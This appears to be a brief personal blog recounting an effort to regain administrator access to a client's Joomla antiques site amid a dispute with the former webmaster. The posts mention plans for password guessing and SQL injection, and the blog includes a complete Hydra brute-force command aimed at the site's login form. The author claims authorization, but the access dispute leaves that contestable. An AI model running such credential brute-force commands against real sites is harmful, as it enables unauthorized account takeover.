hydra -l adminv01 -P pwlist3.txt -s 80 -f www.designer-atelier-antiques.com http-post-form "antiques/administrator/index.php?page=login.php:usrname=^USER^&pass=^PASS^&login-php-submit-button=Login:Incorrect Username"
Monday, August 17, 2015
Since I have been authorized to pentest Design-atelier-antiques, I installed and ran Hydra on Ubuntu Linux. Below is an example of what I typed into the command line window.
Sunday, August 9, 2015
The creator of Design-Atelier-Antiques is claiming that the stakeholder owes for domain renewal payments that he has been making on their behalf. The stakeholder claims that this web master cost them $4000.00. I was astonished by this amount but even more so by the web master withholding Joomla administration access. A scan of this URL should reveal the web master name.
Meanwhile, I've continued to explore ways of regaining control via the following:
Tuesday, August 4, 2015
With the disappearance of the original webmaster and having received permission to hack my client's site, I spidered the URL with Screaming Frog's SEO Spider. After reviewing the results, I determined that the Joomla site had its administrator page here. Now the fun begins with guessing the password, testing for SQL injection and brute forcing a login. Stay tuned.